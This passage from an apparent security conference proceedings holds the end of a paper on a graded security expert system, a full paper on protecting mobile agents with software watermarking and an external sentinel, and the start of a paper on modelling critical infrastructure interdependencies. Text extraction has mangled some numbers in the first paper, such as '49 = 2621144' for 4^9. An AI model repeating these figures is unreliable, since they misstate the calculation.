firewall (6), access control (7), intrusion detection (8), and encryption (9). The number of possible combinations of security levels for all security goals is 4^4 = 256. This is the number of different security classes in our case, see Fig. 1.
Fig. 1. Security classes of graded security model
Fig. 1. A security class determines required security levels for each group of security measures. Abstract security profile is an assignment of security levels (0, 1, 2 or 3) to each group of security measures. Hence, in the present example, we have totally 49 = 2621144 abstract security profiles to be considered. The number of security measures groups may be larger in practice, e.g. 20. This gives a big number of abstract security profiles – 420 for 20 groups. Knowing the costs required for implementing security measures of any possible level, one can calculate the costs of implementing a given abstract security profile. After selecting security levels for a security measures group, one can find a set of concrete measures to be taken. This information is kept in the knowledge modules of the expert system of security measures, see Section 4. It is assumed that, applying security measures, one achieves security goals with some confidence. The security confidence li is described by a numeric value between 0 and 100 for each group of security measures i = 1, . . . , n, where n is the number of groups. We describe overall security of a system by means of an integrated security metrics – the security is evaluated by weighted mean security confidence S: S=
n
ai li ,
i=1
where li is security confidence of i-th security measures group, ai is a weight of the i-th group, i = 1, . . . , n, and n
ai = 1 .
i=1
Information about the costs, required security measures and confidence levels needed for the calculations is presented in the expert system that will be described in Section 4. The graded security methodology, as it is generally accepted, enables one to find the required security measures and costs for a given security class. We add also the value of the weighted mean security confidence S. Fig. 2(a) shows a usual graded security solution: the value of S for given resources r, and also the selected security levels of the security measures groups. The levels for the groups numbered from 1 to 9 are shown on the right-side scale.
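For concreteness, the following minimal sketch (Python; the numeric tables are placeholders, not the actual expert values of the knowledge modules) evaluates the cost and the weighted mean security confidence S of one abstract security profile:

    # Illustrative expert data: cost[i][k] and confidence[i][k] give the
    # cost (in resource units) and the security confidence (0..100) of
    # applying security measures group i at level k.
    cost       = [[0, 2, 5, 9] for _ in range(9)]
    confidence = [[0, 40, 70, 90] for _ in range(9)]
    weights    = [1.0 / 9] * 9          # a_i, must sum to 1

    def evaluate(profile):
        # profile[i] is the level (0..3) chosen for group i.
        total_cost = sum(cost[i][k] for i, k in enumerate(profile))
        s = sum(weights[i] * confidence[i][k] for i, k in enumerate(profile))
        return total_cost, s

    print(evaluate([2, 1, 1, 2, 1, 2, 1, 2, 1]))   # one abstract security profile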
3 Optimization Technique
Our expert system allows us to solve several security related optimization problems. First of all, it enables one to find an optimal security solution for given resources, and to determine the reachable security class. This problem again concerns only one value of resources, and can be illustrated by the same picture as the conventional graded security problem (Fig. 2(a)). To get a broader view of possible solutions, one should look at the optimal security for many different values of usable resources. This service is provided by our expert system by plotting a Pareto optimality tradeoff curve that binds resources and the achievable security S. Fig. 2(b) shows this curve for an interval of resources from r_1 to r_2. The last value of resources, r_2, can be easily calculated as the resources required for reaching the highest security class C3I3A3M3. The curve also shows the respective security levels for selected security measures groups, in the present case for the groups numbered 1 and 4. The exhaustive search of optimal solutions for q possible values of resources, n security measures groups and k security levels requires testing (calculating the weighted mean confidence of) q k^n points. Building optimal solutions gradually, for 1, 2, ..., n security measures groups, enables us to use discrete dynamic programming and to reduce the search considerably. Indeed, the fitness function S defined on intervals from i to j as

    S(i, j) = \sum_{s=i}^{j} a_s l_s

is additive on the intervals, because from the definition of the function S we have S(1, n) = S(1, s) + S(s, n), 1 < s < n. This means that one can build an optimal resource assignment to security measures groups gradually, as a path in the space with coordinates x_1, x_2, where x_1 equals the number of security measures groups that have been assigned resources (i.e. x_1 = s) and x_2 equals the amount of used resource units.
[Figure: (a) conventional graded security solution; (b) Pareto-optimal solutions]
Fig. 2. Conventional graded security solution and Pareto optimality tradeoff curve
This algorithm requires testing of q^2 n k points (q is the number of possible values of resources, n is the number of security measures groups and k is the number of security levels).
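This gradual construction can be sketched as follows (a simplified Python illustration reusing the placeholder cost/confidence/weights tables from the sketch in Section 2; it is not the authors' implementation, which is built in the CoCoViLa environment described in Section 4):

    def pareto_curve(q):
        # dp[r] = best weighted mean confidence achievable by spending
        # exactly r resource units on the groups processed so far.
        NEG = float("-inf")
        dp = [0.0] + [NEG] * q
        for i in range(len(weights)):        # add one group at a time
            nxt = [NEG] * (q + 1)
            for r in range(q + 1):
                if dp[r] == NEG:
                    continue
                for k in range(4):           # candidate level for group i
                    r2 = r + cost[i][k]
                    if r2 <= q:
                        nxt[r2] = max(nxt[r2],
                                      dp[r] + weights[i] * confidence[i][k])
            dp = nxt
        # One point of the Pareto curve per budget value: the best S
        # achievable with at most r units.
        best, cur = [], NEG
        for r in range(q + 1):
            cur = max(cur, dp[r])
            best.append(cur)
        return best

    curve = pareto_curve(70)
    print(curve[34], curve[70])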
4 Security Expert System
A hybrid expert system with a visual specification language for security system description has been built on the basis of the visual programming environment CoCoViLa [7]. The system includes knowledge modules (rule sets) in the form of decision tables for handling expert knowledge of costs and gains, as well as for selecting security measures for each security group depending on the required security level. Other components are an optimization program for calculating the Pareto optimality curve parameterized by available resources, and a visual user interface for the graphical specification of the secured system, visual control of the solution process through a GUI, and visualization of the results. These components are connected through a visual composer that builds a Java program for each optimization problem, compiles it and runs it on the request of the user, see Fig. 3.

Fig. 3. Graded security expert system

Let us explain the usage of the expert system with the following simplified example. We have nine security measures groups as given in Section 2. Two groups, "user training" and "encryption", have specific values of cost and confidence related to security levels that must be given as an input. We can use the standard values of cost and confidence given in the expert knowledge modules for the other groups. We have to solve the problem in the context of banking and can use resources measured in some units on the interval from 1 to 70. The security class C2I1A1M2 is given as an input. The expected outcome is a graph that shows the weighted mean security confidence depending on the resources that are used in the best possible way. The graph should also indicate whether the security goals specified by the security class can be achieved with the given amount of resources. Besides that, the curves showing the security confidence provided by user training and redundancy must be shown. The visual composer is provided by the CoCoViLa system, which supports visual model-based software composition. The main window of the expert system shown in Fig. 4 presents a complete description of the given problem. It also includes visual images of the components of the expert system and a toolbar for adding new components, if needed.
Fig. 4. Problem specification window
In particular, new security measures groups can be added by using the third and fourth buttons of the toolbar. Besides the security measures groups, there are three components, Optimizer, SecClass and GraphVisualizer, shown in the window. The components in the main window can be explicitly connected through ports. This allows us to show which security values should be visualized ("user training" and "redundancy" in the present case), etc. There are extended views of the two security measures groups, "user training" and "encryption", that have explicit values of costs and confidence given as an input. The other groups use the standard values of costs and confidence given in the expert knowledge modules, as specified in the problem description. The SecClass component is used for specifying the security goals. During computations, this component also evaluates the abstract security profiles calculated by the Optimizer against the actual security requirements, using a knowledge module from the expert system.
5 Optimization Results
As an example, in Fig. 5 there is a window showing the optimization results. The upper curve (Confidence) represents the optimal value of weighted mean security confidence depending on the resources that are used in the best possible way. This curve is further divided into four parts to visualize to which degree the optimal result satisfies the security requirements given by the security class. The first part (black line) indicates the interval of resources where none of the four (in our example) security goals can be achieved. The second part (grey line, three separate segments) shows that at least one of the security goals is satisfied while also at least one is not. The third part (thick black line) represents the amount of resources that, when used optimally, would result in satisfying the requirements exactly. One should note that this coincidence of the optimal security profile and
Fig. 5. Solutions window
the security requirements does not always exist. The last part of the graph (black line, again) shows the amounts of resources that exceed what is strictly needed to satisfy the requirements. It is interesting to notice that on the interval of costs from 36 to 45 units it is possible to satisfy all security goals, because already spending 34 units enables one to do this. However, the solutions with the highest values of the weighted mean security confidence do not satisfy all security goals on this interval. The lower graphs indicate (on the right scale) the optimal levels of two measures groups corresponding to the given amount of resources. These graphs are not necessarily monotonic, as can be seen in this example at the resource values 35 and 36. When there are 35 units of resources available, it is reasonable to apply the measure "user training" at level 2. With one more unit of resources, a better overall security confidence level is achieved by taking all resources away from "user training" and investing them into the "redundancy" measures group to achieve level 3.
6 Conclusions
The advantage of the graded security expert system is that it provides a rapid security solution at a sufficiently high, although not 100%, confidence level. Based on our previous experience, the graded security expert system allows a typical security solution to be developed within approximately 8 hours, with about half the time spent on security class identification and the other half on manually analyzing available resources, accepted security risks, attack costs and other optimization variables. Our method reduces the time for this analysis to a few seconds by automatic optimization and by presenting a global view in the form of a Pareto optimal solution. It includes:
– a graded security selection procedure that yields the security measures for a given security class;
– a high-level analysis of the usage of resources for information security and of accepted risks, based on an advanced optimization technique.
We understand that wider application of this method will depend on the availability of expert knowledge that binds costs and security confidence values with the security measures taken. This knowledge can be collected only gradually, and will depend on the type of the critical infrastructure that must be protected.
Acknowledgements. We thank the Estonian Ministry of Defence and the Estonian Defence Forces Training and Development Centre of Communication and Information Systems for the support of this work. The contribution of the second author was partially supported by the Estonian Information Technology Foundation and the Tiger University program.
References
1. Kang, Y., Jeong, C.H., Kim, D.I.: Regulatory approach on digital security of instrumentation, control and information systems in nuclear power plants. Korea Institute of Nuclear Safety, Daejeon, Korea, http://entrac.iaea.org/IandC/TM IDAHO 2006/CD/IAEA%20Day%202/Kang%20paper.pdf (August 31, 2008)
2. German Federal Office for Information Security (BSI): IT Baseline Protection Manual (2005), http://www.bsi.de/gshb/ (August 31, 2008)
3. Estonian Information Systems Three-Level Security Baseline System – ISKE ver. 1.0
4. U.S. Department of Energy, Office of Security Affairs: Classified Information Systems Security Manual (1999)
5. U.S. Department of Defense: National Industrial Security Program Operating Manual (NISPOM) (2006)
6. U.S. Department of Defense, Defense Information Systems Agency: CyberProtect, version 1.1 (July 1999), http://iase.disa.mil/eta/product_description.pdf (August 31, 2008)
7. Grigorenko, P., Saabas, A., Tyugu, E.: Visual tool for generative programming. ACM SIGSOFT Software Engineering Notes 30(5), 249–252 (2005)
Protection of Mobile Agents Execution Using a Modified Self-Validating Branch-Based Software Watermarking with External Sentinel

Joan Tomàs-Buliart (1), Marcel Fernández (1), and Miguel Soriano (1,2)

(1) Department of Telematics Engineering, Universitat Politècnica de Catalunya, C/ Jordi Girona 1 i 3, Campus Nord, Mod C3, UPC, 08034 Barcelona, Spain
(2) CTTC: Centre Tecnològic de Telecomunicacions de Catalunya, Parc Mediterrani de la Tecnologia (PMT), Av. Canal Olímpic S/N, 08860 Castelldefels, Barcelona, Spain
{jtomas,marcel,soriano}@entel.upc.edu
Abstract. Critical infrastructures are usually controlled by software entities. To monitor the correct operation of these entities, a solution based on the use of mobile agents is proposed. Some proposals to detect modifications of mobile agents, such as digital signatures of code, exist, but they are oriented to protecting software against modification or to verifying that an agent has been executed correctly. The aim of our proposal is to guarantee that the software is being executed correctly by a non-trusted host. The way proposed to achieve this objective is an improvement of the Self-Validating Branch-Based Software Watermarking scheme by Myles et al. The proposed modification is the incorporation of an external element, called sentinel, which controls the branch targets. Applied to mobile agents, this technique can guarantee the correct operation of an agent or, at least, detect suspicious behaviours of a malicious host during the execution of the agent, instead of detecting them only once the execution of the agent has finished.
1 Introduction

Nowadays, most critical infrastructures are controlled by software entities. Usually, these systems must operate with high accuracy, but what happens when they are compromised? Some mechanisms are applied in order to protect or increase the security level of these kinds of infrastructures. Commonly used systems like firewalls, intrusion detection systems, honeypots or honeynets are useful to detect and counteract security incidents, but these methods are as necessary as the systems which verify that these security systems work correctly. It seems logical that these systems must be monitored. Logs were the first tools typically used to monitor systems, but they have turned out to be a slow and insufficient on-line monitoring mechanism. Over the last years, alert-based systems have been presented as the alternative, because they can detect anomalies in the systems and send an alert to the central control to inform the manager. In this scenario, mobile agents can be a good solution because their use implies low
This work has been supported partially by the Spanish Research Council (CICYT) Project TSI2005-07293-C02-01 (SECONNET), by the Spanish Ministry of Science and Education with CONSOLIDER CSD2007-00004 (ARES) and by Generalitat de Catalunya with the grant 2005 SGR 01015 to consolidated research groups.
resource consumption from the point of view of the central control, since it is the monitored system which provides these resources. In other words, an agent is sent to a critical infrastructure to control the software which manages this infrastructure. If there are no security incidents, the agent will not send information to the central control and, as a consequence, it will not consume bandwidth or CPU time of this central control. Otherwise, if some security incident is detected by the agent, it will send the relevant information about the security incident to the central control. Since the idea of mobile agents appeared, some related security challenges have arisen. These security challenges can basically be divided into two major groups: how to protect a host from a malicious agent, and how to protect an agent from a malicious host. Some proposals try to solve the first problem. In this case, these proposals guarantee that the agent which will be executed is the agent which the host expects; in other words, they are a priori security systems. On the other hand, the proposals which try to solve the second problem are a posteriori protection systems. That is to say, they are methods which the origin host can use to verify that the host which executed the agent proceeded honestly. The aim of the system presented in this paper is to guarantee the correct operation of an agent on a malicious host or, at least, to detect that something is adulterating the normal operation of this agent, while the agent is being executed by the malicious host. The technique presented is based on an original use of a watermarking mechanism together with branch functions. The algorithm presented is a modification of the algorithm presented by Myles et al. in [1]. The modification proposed is the inclusion of a sentinel element which controls the targets of the branch functions. In the following section, the basic concepts are introduced. An overview of the Self-Validating Branch-Based Software Watermarking scheme by Myles et al. is given in Section 3. Section 4 explains the modifications made to protect mobile agent execution, the security analysis and some implementation aspects. Finally, some conclusions are given.
2 General Concepts

Some general concepts used below are introduced in this section, together with a brief explanation of how each technique is used in this proposal. Software agents can be defined as software entities that migrate between hosts in order to obtain data or perform operations autonomously of user action. A taxonomy of existing agents can be found in [2]. The main attack on mobile agent environments is performed when the host that executes the agent carries out a malicious action in order to produce a dysfunction of the agent. Another technique used is software watermarking. The aim of digital watermarking techniques is to embed information into any digital content. The main characteristic is that the embedded information will be imperceptible to a user of this digital content. A taxonomy of software watermarking and known attacks is presented by Christian Collberg and Clark Thomborson in [3] and [4]. In this paper, a watermarking technique is used in order to insert information in an imperceptible way into the code of the agent, without affecting the normal behaviour of the agent. In parallel to watermarking techniques, there exist similar techniques known as fingerprinting techniques. The concept of fingerprinting was introduced by Wagner in [5] as a method to protect intellectual property in multimedia contents. The fingerprinting technique consists in making the copies of a digital object unique by embedding
a different set of marks in each copy. In this paper, this technique is used in order to produce different and distinguishable copies of the same agent. In this way, agents can be reused several times by watermarking copies of the same agent with different fingerprints.
3 Self-Validating Branch-Based Software Watermarking by Myles et al.

The algorithm presented in [1] fulfils the watermarking requirements and also contributes fingerprinting characteristics to the system. In other words, this algorithm can embed imperceptible authorship information in a piece of code and, in addition, it provides mechanisms to identify the owner of a specific copy of this piece of code. The Self-Validating Branch-Based Software Watermarking algorithm, as its name indicates, is based on the use of a branch function to generate, at runtime, the appropriate fingerprint codeword. As a collateral effect of the use of this type of functions, tamper detection can be incorporated into the algorithm to detect and defeat attacks. This algorithm has two different processes. The first process (equation 1) is the embedding operation (embed). This function requires 4 input parameters: the piece of code to be marked (P), the authorship mark (AM) and two secret keys, key_AM and key_FM. Note that, while key_AM is the same for all copies, each copy will have a different, unique key_FM. The aim of this function is to add the authorship mark and the fingerprint generating code to the program (P), yielding a new piece of code or program (P') and a fingerprinting mark (FM) which is generated from key_FM and the program execution trace. The second process (recognise) is the function which can retrieve the authorship mark and the fingerprinting mark from a marked piece of code or program, given key_AM and key_FM (equation 2). Note that this algorithm has a blind recogniser, that is, marks can be retrieved without the original piece of code (P); only the marked program P' and the respective keys key_AM and key_FM are needed.

    embed(P, AM, key_AM, key_FM) -> P', FM        (1)
    recognise(P', key_AM, key_FM) -> AM, FM       (2)
Fingerprint Branch Function. Branch functions [6] were created to hinder static disassembly of native executables, as the basis of an obfuscation technique. Their operation is conceptually easy: certain jump instructions in the code are replaced by calls to the same function, which redirects these calls to the correct point in the code. Myles et al. defined a special type of branch function named the fingerprinting branch function (FBF). In addition to the normal branch function behaviour, this kind of function modifies the k_i value every time the function is called. This value is used to obtain the destination of the branch in each iteration. Moreover, in the last iteration, k_n takes as its value the fingerprinting mark FM. The aims of the FBF can be schematized as follows: verifying code integrity by obtaining, with a digest function, the value v_i which will be used in the k_i calculation; generating the new k_i value with a one-way function which depends on the values of k_{i-1} and v_i; transferring program execution to the original branch target using the
value of k_i; tamper detection; and incorporating the authorship mark to prove ownership. As an example of the k_i calculation, Myles et al. propose k_i = SHA1[(k_{i-1} XOR AM) || v_i], where || denotes concatenation. Note that the integrity checks, as tamper detection mechanisms, are capable of detecting whether a program has been subjected to a semantics-preserving transformation, or even whether a debugger is present. Figure 1 shows a simplified schema of a tamper detection mechanism. For example, if a malicious host is analysing the agent execution (inserting, for instance, breakpoints in a debugger), the checksum over a block of code will be different from the original checksum, and the branch function will not be able to find the program target for this adulterated checksum.
Embedding process. This process can be divided into three steps. The first step lies in running the program to be marked, using the authorship key (key_AM) as input, to obtain the trace of the program. In the second step of the algorithm, the branches in each function f in F (where F is the set of all functions identified by the trace) are substituted by calls to the FBF. The values for k_i and the mapping between these values and the pointers to the next respective steps are generated. Finally, the resulting structure of the mapping is injected into the code. Note that this mapping is essential to the correct behaviour of the application.
Recognition. When the program is executed taking the pertinent keys as input, the set of functions marked by the fingerprinting process and the FBF are identified. If the one-way function used is known, the supposed author can demonstrate his authorship by supplying his authorship mark and comparing it with the obtained mark. In the same way, as a result of the last call to the FBF, the fingerprint mark is obtained.
Fig. 1. Tamper detection mechanism implemented with checksums and branch functions
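The key chain underlying the FBF can be sketched as follows (a minimal Python illustration; the byte-level encodings and the derivation of k_0 from key_FM are assumptions, since the paper does not fix them):

    import hashlib

    def next_key(k_prev: bytes, am: bytes, code_block: bytes) -> bytes:
        # One FBF iteration: v_i is a digest of the protected code block,
        # and k_i = SHA1[(k_{i-1} XOR AM) || v_i].
        v = hashlib.sha1(code_block).digest()
        mixed = bytes(a ^ b for a, b in zip(k_prev, am))
        return hashlib.sha1(mixed + v).digest()

    am = hashlib.sha1(b"authorship mark").digest()   # AM (assumed encoding)
    k = hashlib.sha1(b"key_FM").digest()             # k_0 from key_FM (assumed)
    for block in (b"code block 1", b"code block 2", b"code block 3"):
        k = next_key(k, am, block)
    print("FM =", k.hex())                           # k_n plays the role of FM

Any tampering with a code block changes the corresponding v_i and derails every subsequent k_i, so the branch targets can no longer be resolved; this is exactly the tamper detection effect described above.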
4 Self-Validating Branch-Based Software Watermarking with External Sentinel

Taking into account its functionality, the Fingerprinting Branch Function presented in the previous section can be divided into three different modules. k_i calculator: the aim
of this module is to calculate k_i with some prefixed one-way function which involves k_{i-1}, v_i and the authorship mark AM. Mapping: the mapping between the different values of k_i and the pointers to the next instruction to execute in the program execution flow. Execution control transferrer: this part is in charge of redirecting the program execution flow to the target instruction pointed out by the pointer supplied by the previous mapping. In the original algorithm, these three parts were indivisible: they stayed in the same function, which carried out all three operations. In this proposal, these parts are differentiated and divided. The k_i calculator and the Execution control transferrer remain in the same function, but the Mapping is moved from the mobile agent to another host, which is named the sentinel. The sentinel can be a trusted third party, but it can also be adapted to a hierarchical structure in a mobile agent architecture which controls critical distributed infrastructures. In this case, the sentinel is the server in charge of controlling some part of the infrastructure, and it can simultaneously be audited by another mobile agent with another sentinel, and so on. The main difference between the typical embedding process of the Myles et al. algorithm and our embedding process is in the third step. In our modified algorithm, the mapping is not injected into the code. This information is located on the sentinel host instead of being embedded into the code. The k_i calculation module is invoked when the Modified Fingerprinting Branch Function (MFBF) is called. This process is the same as in the original algorithm, and it must also depend on the code integrity check, the previous value of k_i and the authorship mark (AM). The obtained value is used to find the next instruction in the normal execution process of the agent. This value is used by the Execution Control Transferrer module to send a request to the sentinel for the pointer to the next instruction. This request is sent through a secure channel between the audited host and the sentinel. The sentinel uses the information contained in the request as the index to search the mapping between the possible values of k_i and their corresponding pointers. When the pointer is found, it is sent through the same secure channel to the Execution Control Transferrer, and this module transfers execution control to the instruction indicated by the pointer. A more graphical explanation can be found in Fig. 2.
Fig. 2. Schema of self-validating branch-based software watermarking with external control operation
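A minimal sketch of the sentinel-side lookup described above, with an interface of our own invention (the paper does not prescribe one): the sentinel holds the mapping built at embedding time and treats an unknown ki as evidence of tampering.

```python
class Sentinel:
    def __init__(self, mapping):
        # mapping: expected k_i value (bytes) -> pointer (code offset, int)
        # to the next instruction, precomputed during the embedding process
        self.mapping = mapping

    def resolve(self, k_i):
        # A k_i outside the mapping signals an adulterated checksum or a
        # tampered request; the sentinel can then isolate or punish the host.
        return self.mapping.get(k_i)
```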
4.1 Security Analysis

Note that the proposed system assumes that a secure channel exists from the monitored host to the sentinel; assuming that a mobile agent can itself build a secure channel to an external host (the sentinel in this case) would be very unrealistic, whereas assuming a secure channel between the monitored host and the sentinel is a realistic approach. This security analysis is therefore centred on the vulnerabilities between the secure channel and the agent; in other words, the main problems for the proposed system arise when the host which lodges the agent acts to produce dysfunctions in the correct execution of the agent.

ki interception or modification: The ki values can be intercepted and modified by the host when the agent sends them to the sentinel. If the host only performs a passive attack, it cannot obtain any critical information from these values, since each ki is the output of a one-way function; in this case the sentinel can never detect the action. If the host performs an active attack, that is, a ki value is modified by the host, the sentinel can identify this action as an attack and will start actions to punish the host or simply isolate the part of the infrastructure that depends on this agent.

Returned pointer interception or modification: The pointer returned to the mobile agent from the sentinel can be intercepted or modified. The first case cannot be detected by the sentinel, but this action has no dangerous consequences for the system. The modification of the returned pointer can cause a dysfunction in the agent, but this dysfunction will produce an erroneous ki value or will stop the agent execution. In both cases, the action will be detected by the sentinel through the next request from the agent or by an execution time control system like those proposed in [7] or [8]. On the other hand, the malicious host can try to perform a loop attack, that is, always sending the same ki to the sentinel. As ki is calculated taking into account the value of ki−1 , loops intended to confuse the sentinel are not possible, because the one-way function involved in the ki calculation never repeats values; in a genuine loop the agent produces a new ki on every iteration. In the same way, if the host tries to perform a denial-of-service attack, this will be detected by the sentinel.

Debugging or disassembly: This algorithm includes code verifications and integrity checks in order to identify whether the mobile agent has been subjected to semantics-preserving transformations or even whether a debugger is present. Moreover, branch functions are the typical solution against static disassembly of native executables, so the malicious host is not able to perform this kind of attack without being detected by the sentinel.

Breaking or stopping agent execution: These actions can be detected with an execution time control system; many such techniques have been proposed, e.g., [7] or [8].

Mobile agent renovation: Periodically replacing the agent with another copy of the same agent, but with another fingerprint, is highly recommendable, because the new agent will have new ki values different from those of the old agent. This adds security to the system by preventing the host from obtaining enough information from the agent to perform a successful attack on the system. This functionality has been taken into account in this proposal and is easily achieved by changing keyFM .
4.2 Implementation Aspects

In the proposed system, the mobile agent needs a periodic connection to the sentinel in order to continue its normal operation. This is not a problem in critical infrastructure control, because intercommunication between the controlled system and the controlling systems is always necessary; moreover, the amount of bytes that the systems interchange can be minimised with this proposal. Another aspect is the latency caused by the transmission time of requests and responses between agent and sentinel, and by the processing time spent by the sentinel. Fortunately, the speed of critical infrastructure networks is adequate, and this time can be considered negligible. Obviously, when the number of calls to the MFBF increases, the execution time also increases. Hence a threshold must be defined at design time, based on the security level required and the maximum delay that the monitored system can tolerate between the moment an incident occurs and the moment it is detected.
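As a rough illustration of this design-time trade-off (the figures and the simple worst-case model are our assumptions, not values from the paper): with one sentinel round trip per MFBF call, an incident occurring just after a call is only detected at the next call.

```python
# Pick the largest interval between MFBF calls that still meets the required
# detection delay; rtt_s covers transmission plus sentinel processing time.
def max_call_interval(max_detection_delay_s: float, rtt_s: float) -> float:
    # Worst case: the incident occurs immediately after a call and is
    # detected one round trip after the following call.
    return max_detection_delay_s - rtt_s

print(max_call_interval(max_detection_delay_s=2.0, rtt_s=0.05))  # -> 1.95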
5 Conclusions

A novel approach to guarantee the security of mobile agent execution on a compromised host has been presented. The approach is based on the algorithm presented by Myles et al. in [1], which provides, in addition to authorship protection, code integrity checking, tamper detection and fingerprinting capabilities. The original algorithm is based on branch functions that transfer the agent execution to the correct point in the program execution flow, using a value obtained from a one-way function which depends on the authorship mark and the integrity check. Our improvement is the incorporation of an external element, called the sentinel, which keeps the relation or mapping between the values obtained from the one-way function (ki ) and the pointer to the next instruction in the program execution flow. The controlled host needs to send the appropriate ki value to the sentinel and wait for the response in order to execute the agent in the correct way. On the other hand, the sentinel can periodically control the agent execution, because it knows the correct sequence of ki for each agent. Additionally, a security analysis of the proposed scheme has been presented and some aspects related to its implementation have been discussed.
References

1. Myles, G., Jin, H.: Self-validating branch-based software watermarking. In: Barni, M., Herrera-Joancomartí, J., Katzenbeisser, S., Pérez-González, F. (eds.) IH 2005. LNCS, vol. 3727, pp. 342–356. Springer, Heidelberg (2005)
2. Franklin, S., Graesser, A.: Is it an agent, or just a program?: A taxonomy for autonomous agents. In: ECAI 1996: Proceedings of the Workshop on Intelligent Agents III, Agent Theories, Architectures, and Languages, London, UK, pp. 21–35. Springer, Heidelberg (1997)
3. Collberg, C., Thomborson, C.: On the limits of software watermarking. Technical Report 164, Department of Computer Science, The University of Auckland (August 1998)
4. Collberg, C., Thomborson, C.: Software watermarking: Models and dynamic embeddings (January 1999)
5. Wagner, N.R.: Fingerprinting. In: SP 1983: Proceedings of the 1983 IEEE Symposium on Security and Privacy, Washington, DC, USA, p. 18. IEEE Computer Society, Los Alamitos (1983)
6. Linn, C., Debray, S.: Obfuscation of executable code to improve resistance to static disassembly. In: CCS 2003: Proceedings of the 10th ACM Conference on Computer and Communications Security, pp. 290–299. ACM Press, New York (2003)
7. Hohl, F.: Time limited blackbox security: Protecting mobile agents from malicious hosts. In: Vigna, G. (ed.) Mobile Agents and Security. LNCS, vol. 1419, pp. 92–113. Springer, Heidelberg (1998)
8. Esparza, O., Soriano, M., Munoz, J.L., Forne, J.: A protocol for detecting malicious hosts based on limiting the execution time of mobile agents. In: Proceedings of the Eighth IEEE International Symposium on Computers and Communication (ISCC 2003), vol. 1, pp. 251–256 (2003)
Adaptation of Modelling Paradigms to the CIs Interdependencies Problem Jose M. Sarriegi1, Finn Olav Sveen1 , Jose M. Torres1 , and Jose J. Gonzalez2 1
Tecnun, Paseo Manuel de Lardizabal 13 20018 Donostia - San Sebastian, Spain
[email protected],
[email protected],
[email protected] 2 University of Agder, Faculty of Engineering and Science, 4884 Grimstad, Norway Gjovik University College, NISlab, 2802 Gjovik, Norway
[email protected] Abstract. Research into critical infrastructure (CI) interdependencies is still immature. Such interdependencies have important consequences for crisis management. Owing to the complexity of this problem, computer modelling and simulation is perhaps the most efficient research approach. We present five facts that should be taken into account when modelling these interdependencies: 1) CIs are interdependent elements of a complex system. 2) Ever increasing interdependencies create new complexity. 3) Crises in CI are dynamically complex. 4) There is a need for a long term perspective. 5) Knowledge about CI is fragmented. These facts significantly condition the tools and methodologies to be used for modelling interdependencies, as well as the training and communication tools to transfer insights to crisis managers and policymakers. We analyze several modelling methodologies for their applicability to the CIs interdependencies problem.
1 Introduction

The consequences of critical infrastructure (CI) failure can be considerable, even to the point where Society stops. CIs such as energy, transportation and Information and Communication Technologies (ICT) need to operate reliably and continuously 24 hours a day, 7 days a week. Serious crises can occur if CIs are disturbed. Relatively short interruptions may lead to serious long term consequences, which may also spread to other infrastructures. E.g., the modelling and simulation study by Conrad et al. [1] showed that the loss of energy infrastructure, even for a relatively short time, is likely to cause deaths, e.g., as emergency services cannot be reached when telephone services become disabled. Chang et al.'s [2] analysis of the 1998 Canadian ice storm power outage showed similar effects. The loss of energy infrastructure led to oil supply problems because most electric pumps of gas stations were unable to pump fuel. Dorval airport lost its power supply and nearly ran out of fuel. Railways were shut down because signals and switches were no longer working. The Atwater and Desbaillets reservoirs only had 4-6 hours of clean water left. Patients stayed longer in hospitals to avoid returning to blacked out homes, tying up beds needed for new patients. In addition, the distribution of medicines was slowed down as elevators were no longer operating. Natural disasters, accidents, criminals and terrorists threaten CIs. Traditionally they have been a direct threat to physical assets. However, Information and Communication
Technology (ICT) is a new vector over which the impacts of these threats can propagate. The "security culture" related to control systems has been shaped by their inception for isolated operation in the innocent times of the past. It is a tradition of physical separation, tailor-made proprietary solutions and security-by-obscurity. In addition to the danger from external attacks, the threat from malicious insiders, possibly operating in tandem with outsiders, is considerable. Additionally, new technologies and evolving operational modes generate unfamiliar risks, which have an "emergent character": they derive from interdependencies and circumstances that have not been anticipated by the designers and the users of CIs. I.e., they are risks that are shaped in novel ways by the different man-technology-organization relationships [3]. Challenges in a CI crisis situation include not only technical, but also legal, economic and social issues. Business priorities, language and cultural differences may exacerbate crises. Multiple regulatory agencies and other unforeseen barriers may cause conflicting actions. When we lack experience we must turn to other methods to understand, predict and prepare for crises and their possible consequences. One way is through computer modelling and simulation. To achieve success, the simulation environment must be able to realistically describe the strategic environment of a large crisis. Furthermore, crises involve transient, dynamic phenomena, which may have a significant impact on the unfolding of the crisis and must be represented. In the first part of this paper, we identify five characteristics of the CIs interdependencies problem that have to be taken into account during its analysis. In the second part, we review some representative simulation models that have been built using four different modelling paradigms to discover their benefits and limitations.
2 Characteristics of CIs Interdependencies Problem

2.1 CIs Are Interdependent Elements of a Complex System

"One of the most frequently identified shortfalls in knowledge related to enhancing CI protection capabilities is the incomplete understanding of interdependencies between infrastructures" [4]. Consequently, failing to understand these interdependencies and their dynamics will result in ineffective response and poor coordination between decision makers and agencies responsible for rescue, recovery and restoration [5]. As CIs are not isolated from one another, we need a "system of systems" perspective to analyse them. Any one individual organization, concerned with its own problems, is unlikely to have a complete understanding of how its actions affect other actors in the system. Hence, unexpected and unintended behaviour is likely to occur in CIs and dependent systems during crisis situations. Furthermore, owing to the last decade's trend of deregulation, these CIs are no longer centrally controlled. As such, we are dealing with a large number of tightly coupled networks in which there is a multitude of agents with differing goals. Thus, it may be more appropriate to talk about a "network of networks". According to Rinaldi [6] there are four different types of CI interdependencies. The presence of any of the four types of interdependencies means that a failure in one infrastructure will most likely propagate to other infrastructures:
1. Physical: if the state of each CI depends upon the material output(s) of other CIs.
2. Cyber: if a CI's state depends on information transmitted through the ICT infrastructure.
3. Geographic: if local environmental changes affect all the CIs in that region, e.g., when the flooding of a reservoir knocks out a generator. This implies close spatial proximity.
4. Logical: if the state of each CI depends upon the state of another via policy, legal, regulatory or some other kind of mechanism.

2.2 Ever-Increasing Interdependencies Create New Complexity

